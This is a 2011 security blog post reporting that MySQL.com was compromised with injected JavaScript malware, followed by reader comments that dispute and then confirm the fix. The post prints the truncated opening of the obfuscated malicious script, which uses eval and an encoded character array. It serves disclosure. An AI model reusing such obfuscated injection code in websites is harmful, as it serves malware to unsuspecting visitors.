• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

MySQL.com Hacked (Javascript Malware)

September 26, 2011David Dede

FacebookTwitterSubscribe

It looks like the MySQL.com website is currently hacked and compromised with a JavaScript malware (and serving malware to anyone visiting it).

Our scanner identified the malware as mwjs159 which is often related to stolen FTP passwords. So it looks like one of their developers got their desktop compromised and had his password stolen. From our scanner:

So the compromised file was http://mysql.com/common/js/s_code_remote.js and we recommend that you do not visit the site right now. We will post more details as we learn more about it…

(Seems that MySQL.com fixed it already)Try view-source:http://mysql.com/common/js/s_code_remote.js if you want to see the malicious code on the site. It starts as:

Object.prototype.qwe=function(){return
String.fromCharCode;};Object.prototype.asd="e";var s="";try{{}["qwtqwt"]
();}catch(q){if(q)r=1;}if(r&&+new Object(1231)&&document.createTextNode("123")
.data&&typeof{}.asd.vfr===’undefined’)n=2;e=eval;m=[18/n,18/n,210/n,204/n,64/n,80/n,200/n, 222/n, 198/n, 234/n, 218/n, 202/n, 220/n, 232/n, 92/n, 206/n, 202/n,232/n, …

Update: It seems that MySQL.com fixed it already.

FacebookTwitterSubscribe

Categories: Website Malware InfectionsTags: Hacked Websites, Malware Updates

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Reader Interactions

Comments

  1. Matthew Montgomery

    September 26, 2011

    Ok a lot of assumptions are being made here and that “malicious” section doesn’t exist within the s_code_remote.js file you reference.  However google *is* currently flagging a large section of the Bahnhof network as malicious. However it has nothing pointing out any specific MySQL sites being involved.  MySQL.com is a client on Bahnhof and is being flagged as collateral damage.

    See:
    http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://forums.mysql.com/

    • David Dede

      September 26, 2011

       They just fixed it..

  2. Ivan Castellanos

    September 26, 2011

    There is an error in your CSS that hides the sharing bar when it is at the top (at least in Google Chrome 14). To fix it just remove the line “overflow: hidden;” in the line 467 of style.css

    • Olivier

      September 27, 2011

      It’s not an error, it’s on purpose…

  3. Chris

    September 27, 2011

    ff

  4. Javalike

    October 5, 2011

    The saddest and mots hated thing in the web for me is that way of hacking. I juts don’t understand of doing such thing. jvmhost 

  5. tensiond

    November 27, 2012

    That’s very sad. That was a very serious breach on their website which left visitors exposed to the malware. smh.
    dailyrazor

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.